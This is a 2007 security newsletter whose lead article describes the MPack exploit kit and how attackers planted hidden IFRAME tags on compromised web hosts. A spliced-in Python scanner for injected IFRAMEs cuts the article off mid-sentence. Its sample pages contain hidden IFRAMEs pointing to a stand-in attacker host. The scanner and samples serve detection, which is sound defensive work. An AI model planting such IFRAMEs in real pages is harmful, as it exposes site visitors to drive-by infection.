MPack Runs Rampant


Forwarded with permission from: Security UPDATE 


Risky Business: Managing Risk Through Security 

Keep Unsecured Machines Off Your Network 

Automated GLBA Security Compliance: Free Report 

=== CONTENTS ==================================================
IN FOCUS: MPack Runs Rampant

   - Latest ZLOB Plays on People's Desire for Online Video
   - HP to Provide Web Application Security
   - PatchLink Moves to Unify Protection and Control
   - Recent Security Vulnerabilities

   - Security Matters Blog: Hack the Beta--Win a Game Box
   - FAQ: Preparing AD for Exchange 2007
   - From the Forum: Preventing Power Users from Creating Shares 
   - Share Your Security Tips

   - Continuous Authentication and Encryption
   - Wanted: Your Reviews of Products 




=== SPONSOR: Neverfail ========================================
Risky Business: Managing Risk Through Security 
   Every business faces risk. Have you properly assessed your company's 
risk and put a focus on business continuity? Attend this free Web 
seminar and learn how you can ensure seamless recovery of your key 
systems and keep your users continuously connected. On-demand Web 

=== IN FOCUS: MPack Runs Rampant ==============================
by Mark Joseph Edwards, News Editor, mark at ntsecurity / net

The need to secure your Web servers has never been higher. In the past, 
many people worried about potential damage to their company's 
reputation should their site be broken into. After all, a defacement 
negatively affects not only a Web site but also a company's public 

But there's another, more dangerous aspect to keep in mind: Your site 
might be turned into a vicious attack vector, making you responsible 
for damaging any number of innocent people's computers. Anyone with a 
public-facing Web site has a serious responsibility to protect its 
visitors. And if you're hosting other people's Web sites, your level of 
responsibility is exponentially higher.

A case in point that clearly demonstrates the need for vigilance is the 
relatively new MPack tool--not to be confused with the compression 
software of the same name.

MPack is an automated, intelligent, server-based attack tool that is 
being used to infect untold numbers of computers. It's basically like 
Metasploit, except that targets are pushed towards MPack en masse. The 
tool is PHP-based and is a flexible attack platform complete with a 
back-end management and monitoring interface. The server components are 
used to deliver exploit payloads to browsers, and people place links to 
an MPack server into Web pages all over the Internet. 

The primary motive of MPack is to generate income through criminal 
activity. Its creators have been selling the tool for about $700 since 
at least December 2006 along with attack modules that evolve as new 
attack types become possible. According to Panda Labs, new modules cost 
anywhere from $50 to $150 depending on the level of exploitation a 
module can carry out.

Recently, intruders using MPack set up domains hosting Web sites that 
contain links to attack code, and broke into numerous Web hosting 
accounts (and quite possibly privately operated Web sites) to plant 
attack code in the pages of those unsuspecting, compromised Web sites. 
The attack code typically consists of IFRAME tags that tell a visitor's 
browser to load a malicious Web page inside an existing Web page. The 
browser can be instructed to load a malicious Web page without the user 
having to take any action other than to visit the compromised Web site, 
and the IFRAME can be coded to not even be noticeable on the 
compromised site. So the visitor might remain completely unaware that 
exploitation is taking place.

The malicious Web page contains code that, when run, can determine the 
visitor's OS and browser type and then deliver corresponding exploit 
code. Code exists to exploit Windows, Linux, BSD, and Mac OS systems as 
well as at least seven browsers and various components, such as Apple 
QuickTime, WinZip, and other common tools. MPack can also be made to 
instruct a vulnerable computer to download malicious files. From there, 
a huge range of possibilities opens up.

Panda Labs reports that one Web server recently inspected contains 
7,644 Web pages infected with links to MPack-based exploits. Exactly 
how many sites and pages have been infected remains unknown; however 
one trusted source told me that at least one major hosting company 
(which I won't name) found that its servers were compromised through a 
combination of exploits, and as a result, a large number of index.php 
files were overwritten to contain exploits based on MPack. 

In that incident, I was able to take a look at several of the affected 
sites because I know the operators of those sites. The intruders made a 
puzzling choice to completely overwrite every file that contained the 
string "index" with a simple IFRAME tag to launch exploits. Since all 
the index pages for the affected sites suddenly started showing up 
empty, the break-in became obvious sooner rather than later. 

I have no idea why the intrusion was made so obvious. Had the intruders 
inserted an IFRAME tag into existing HTML instead of overwriting pages 
entirely, the intrusion could have gone undetected for a very long 
time, and the number of infected computers would have risen 
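As an added illustration (not code from this newsletter, from MPack, or from any product it mentions), here is a small Python scanner a site operator could run over a Web root to catch both patterns described above: IFRAME tags that are hidden (zero size or CSS-hidden) or that point at a host outside the site's own, and "index" files whose entire content is a single IFRAME, the overwrite pattern seen in the hosting incident. The file names, page bodies and hostnames (`attacker.invalid`, `www.example.invalid`) are constructed placeholders for the example.

```python
"""Scan HTML/PHP pages for injected IFRAME tags (added example, not from the newsletter)."""
import os
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# CSS that makes an IFRAME invisible to the visitor.
HIDDEN_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


class IframeCollector(HTMLParser):
    """Collects every <iframe> attribute set and counts visible text characters."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.text_chars = 0  # non-whitespace text; 0 means the page shows nothing

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})

    def handle_data(self, data):
        self.text_chars += len(data.strip())


def _is_zero(value):
    """True for width/height values of 1px or less (the classic 1x1 hidden frame)."""
    v = value.strip().rstrip("px%").strip()
    try:
        return float(v) <= 1
    except ValueError:
        return False


def classify_iframe(attrs, own_hosts):
    """Return the list of reasons one IFRAME looks injected (empty list = benign)."""
    reasons = []
    host = urlparse(attrs.get("src", "")).hostname
    if host and host.lower() not in own_hosts:
        reasons.append("external-src:" + host)
    if _is_zero(attrs.get("width", "")) or _is_zero(attrs.get("height", "")):
        reasons.append("zero-size")
    if HIDDEN_CSS.search(attrs.get("style", "")):
        reasons.append("css-hidden")
    return reasons


def scan_html(name, html, own_hosts):
    """Return (file, reason) findings for one page body."""
    parser = IframeCollector()
    parser.feed(html)
    findings = [(name, r) for a in parser.iframes for r in classify_iframe(a, own_hosts)]
    # Overwrite pattern: an "index" file whose only content is an IFRAME.
    if "index" in os.path.basename(name).lower() and parser.iframes and parser.text_chars == 0:
        findings.append((name, "index-file-is-only-iframe"))
    return findings


def scan_tree(root, own_hosts):
    """Walk a Web root on disk and scan every .html/.htm/.php file."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith((".html", ".htm", ".php")):
                path = os.path.join(dirpath, f)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_html(path, fh.read(), own_hosts))
    return findings


# Constructed sample pages (placeholders, not real infections):
# an overwritten index file, a page with an injected hidden frame, and a clean page.
SAMPLE_PAGES = {
    "index.php": '<iframe src="http://attacker.invalid/in.php" width="1" height="1"></iframe>',
    "about.html": '<html><body><h1>About us</h1><p>Hello</p>'
                  '<iframe src="http://attacker.invalid/in.php" style="display:none"></iframe>'
                  '</body></html>',
    "contact.html": '<html><body><p>Mail us</p>'
                    '<iframe src="/widgets/map.html" width="400" height="300"></iframe>'
                    '</body></html>',
}


def scan_samples(own_hosts=("www.example.invalid",)):
    """Run the scanner over the constructed samples; flags index.php and about.html only."""
    findings = []
    for name, html in SAMPLE_PAGES.items():
        findings.extend(scan_html(name, html, set(own_hosts)))
    return findings


if __name__ == "__main__":
    for name, reason in scan_samples():
        print(f"{name}: {reason}")
```

Running `scan_tree("/var/www/html", {"www.example.invalid"})` against a real document root gives the same kind of (file, reason) list; an "external-src" hit on its own can be legitimate (embedded maps, ad frames), so the combination with "zero-size" or "css-hidden" is the strong signal, and "index-file-is-only-iframe" is the overwrite case that made the break-in above so obvious.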

If you're interested in more details about MPack, Panda Labs published 
a detailed analysis of the MPack attack platform, available at the URL 
below in PDF format. 

=== SPONSOR: St. Bernard Software =============================
Keep Unsecured Machines Off Your Network
   Tune into the hottest up-to-date network security protection through 
this exclusive podcast featuring Windows IT Pro editor Karen Forster 
and Microsoft's Ian Hameroff. Learn how Network Access Control (NAC) 
and Network Access Protection (NAP) work and what technologies are 
involved, as well as what third-party products are poised to work with 
these technologies. 

=== SECURITY NEWS AND FEATURES ================================
Latest ZLOB Plays on People's Desire for Online Video
   While ZLOB has been tracked in more than 1,000 renditions since late 
2005, several security firms reported that the latest ZLOB outbreak 
takes social engineering to a new extreme to lure people into its trap. 

HP to Provide Web Application Security
   HP will acquire SPI Dynamics, maker and provider of Web application 
security assessment software and services. 

PatchLink Moves to Unify Protection and Control
   PatchLink will acquire SecureWave, thereby taking another step 
towards unified protection and control. 

Recent Security Vulnerabilities
   If you subscribe to this newsletter, you also receive Security 
Alerts, which inform you about recently discovered security 
vulnerabilities. You can also find information about these 
discoveries at 

=== SPONSOR: Qualys ===========================================
Automated GLBA Security Compliance: Free Report 
   Compliance and knowledge of every aspect of the GLBA is mandatory. 
Through web services, on demand security is automated and immediate 
compliance to the GLBA safeguard guidelines is achieved. Learn how 
comprehensive GLBA compliance is managed through internal and external 

=== GIVE AND TAKE =============================================
SECURITY MATTERS BLOG: Hack the Beta--Win a Game Box
by Mark Joseph Edwards, 

Here's an opportunity to put a beta security product through the 
wringer and possibly win one of several game boxes in the process. 

FAQ: Preparing AD for Exchange 2007
by John Savill, 

Q: How do I manually prepare my AD forest and domain for Exchange 
Server 2007?

Find the answer at 

FROM THE FORUM: Preventing Power Users from Creating Shares
   A forum participant wants to disallow power users from creating or 
modifying shares. He's looked through Group Policy Objects (GPOs) and 
can't find a way to remove the Shares snap-in under Computer Management 
or just lock it out. If prevention isn't possible, is there a way to 
turn on auditing for share creation? To join the discussion, go to 

   Share your security-related tips, comments, or problems and 
solutions in Security Pro VIP's Reader to Reader column. Email your 
contributions to If we print your submission, 
you'll get $100. We edit submissions for style, grammar, and length.

=== PRODUCTS ==================================================
by Renee Munshi, 

Continuous Authentication and Encryption
   2factor announced Real Privacy Management (RPM), a two-factor 
private-key software solution that can be deployed standalone or inside 
a software application, device, or chip. RPM continuously generates new 
256-bit secret keys that are used to mutually authenticate each party 
and to encrypt/decrypt every data transmission in real time. 2factor 
also announced SecureWeb, a small auto-loading applet that invokes a 
secure instance of the user's default browser. SecureWeb runs RPM to 
authenticate and encrypt sensitive transactions. For more information, 
go to 

WANTED: your reviews of products you've tested and used in 
production. Send your experiences and ratings of products to and get a Best Buy gift certificate. 

=== RESOURCES AND EVENTS ======================================
   For more security-related resources, visit 

Black Hat USA 2007, July 28-August 2 in Las Vegas, is the world's 
premier technical event for ICT security experts. Choose from 30 hands-
on training courses and 90 briefings presentations with lots of new 
content and new tools. Network with 4,000 delegates from 70 nations. 
Visit product displays by 30 top sponsors in a relaxed setting. 

Improve the security of Linux and UNIX computers by letting them 
authenticate and authorize users through Microsoft Active Directory. 
This white paper shows how you can lower costs, improve security, 
simplify user account management, and demonstrate compliance with 
regulatory requirements. 

Gain control over the growing amount of file data in your enterprise. 
Learn how file area networks can help you centralize file 
consolidation, migration, replication, and failover. Download this 
eBook and start streamlining your file management projects today! 

=== FEATURED WHITE PAPER ======================================
One of the main concerns in the IT industry today is security. This 
white paper, written by Microsoft MVP for Terminal Services Claudio 
Rodrigues, takes a deep look at security concerns, the available 
solutions, their drawbacks, and a new complementary way of addressing 
today's security issues. 

=== ANNOUNCEMENTS =============================================
Introducing a Unique Exchange and Outlook Resource 
   Exchange & Outlook Pro VIP is an online information center that 
delivers new articles every week on messaging topics such as 
administration, migration, security, and performance. Subscribers also 
receive tips, cautionary advice, direct access to our editors, and a 
host of other benefits. Order now at an exclusive charter rate and save 
up to $50! 

Special Invitation for VIP Access 
   Become a VIP subscriber and get continuous inside access to all the 
content published in Windows IT Pro, SQL Server Magazine, Exchange & 
Outlook Pro VIP, Scripting Pro VIP, and Security Pro VIP. Subscribe 

Security UPDATE is brought to you by the Windows IT Pro Web site's 
Security page (first URL below) and Security Pro VIP (second URL 

Subscribe to Security UPDATE at 

Be sure to add 
to your antispam software's list of allowed senders.

To contact us: 
About Security UPDATE content -- 
About technical questions -- 
About your product news -- 
About your subscription -- 
About sponsoring Security UPDATE -- 

View the Windows IT Pro privacy policy at 

Windows IT Pro, a division of Penton Media, Inc.
221 East 29th Street, Loveland, CO 80538
Attention: Customer Service Department

Copyright 2007, Penton Media, Inc. All rights reserved.

